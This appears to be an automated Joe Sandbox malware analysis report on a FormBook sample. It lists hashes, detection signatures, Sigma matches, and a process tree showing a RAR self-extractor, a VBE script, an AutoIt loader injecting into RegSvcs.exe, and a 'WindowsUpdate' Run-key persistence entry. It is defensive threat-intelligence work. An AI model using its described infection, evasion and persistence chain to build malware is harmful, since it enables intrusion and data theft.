Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uhbrQkYNzx.exe

Overview

General Information

Sample name:uhbrQkYNzx.exe
renamed because original name is a hash value
Original sample name:f9b5af130a858971c48de2b78ac57dc335d2e5fa905887ab0e058c083cfc5fe3.exe
Analysis ID:1569428
MD5:c98eea303da1d7b92f96d6a8b62d74d2
SHA1:1ef9752163fa156a8831d759d2750ca23fa38e26
SHA256:f9b5af130a858971c48de2b78ac57dc335d2e5fa905887ab0e058c083cfc5fe3
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • uhbrQkYNzx.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\uhbrQkYNzx.exe" MD5: C98EEA303DA1D7B92F96D6A8B62D74D2)
    • wscript.exe (PID: 3540 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2356 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 1916 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 6668 cmdline: "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tguujh.msc (PID: 2056 cmdline: tguujh.msc nhhjmppg.dll MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 3028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 2840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 1624 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 3256 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • tguujh.msc.exe (PID: 5748 cmdline: "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6844 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 5580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 5204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      Process Memory Space: tguujh.msc PID: 2056JoeSecurity_AntiVM_1Yara detected AntiVM autoit scriptJoe Security
        Process Memory Space: tguujh.msc PID: 2056JoeSecurity_AutoitInjectorYara detected Autoit InjectorJoe Security
          Process Memory Space: tguujh.msc.exe PID: 5748JoeSecurity_AntiVM_1Yara detected AntiVM autoit scriptJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              15.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3540, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2356, ProcessName: cmd.exe
                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3540, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2356, ProcessName: cmd.exe
                Sigma detected: New RUN Key Pointing to Suspicious Folder
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, ProcessId: 5748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, ProcessId: 5748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: tguujh.msc nhhjmppg.dll, CommandLine: tguujh.msc nhhjmppg.dll, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6668, ParentProcessName: cmd.exe, ProcessCommandLine: tguujh.msc nhhjmppg.dll, ProcessId: 2056, ProcessName: tguujh.msc
                Sigma detected: Use NTFS Short Name in Command Line
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, CommandLine: "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, ProcessId: 5748, ProcessName: tguujh.msc.exe
                Sigma detected: Use Short Name Path in Command Line
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\uhbrQkYNzx.exe", ParentImage: C:\Users\user\Desktop\uhbrQkYNzx.exe, ParentProcessId: 2004, ParentProcessName: uhbrQkYNzx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" , ProcessId: 3540, ProcessName: wscript.exe
                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc, ProcessId: 2056, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: uhbrQkYNzx.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: uhbrQkYNzx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: uhbrQkYNzx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: uhbrQkYNzx.exe
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.2027782014.0000000000E60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2027782014.0000000000E60000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_0099F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0099F826
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B1630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_009B1630
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009C1FF8 FindFirstFileExA,0_2_009C1FF8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00CBE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00CBD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00CBDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00CC9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00CCA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00CCA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC65F1 FindFirstFileW,FindNextFileW,FindClose,10_2_00CC65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C8C642 FindFirstFileExW,10_2_00C8C642
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00CC72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC7248 FindFirstFileW,FindClose,10_2_00CC7248
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C2E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00C2E387
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C2D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C2D836
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C2DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C2DB69
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C39F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C39F9F
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C3A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C3A0FA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C3A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00C3A488
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C365F1 FindFirstFileW,FindNextFileW,FindClose,16_2_00C365F1
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BFC642 FindFirstFileExW,16_2_00BFC642
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C372E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00C372E9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C37248 FindFirstFileW,FindClose,16_2_00C37248
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\AppData\Local\Temp\RarSFX0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user\AppData\Local\Temp\RarSFX0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscFile opened: C:\Users\user~1\AppData\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CCD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00CCD7A1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
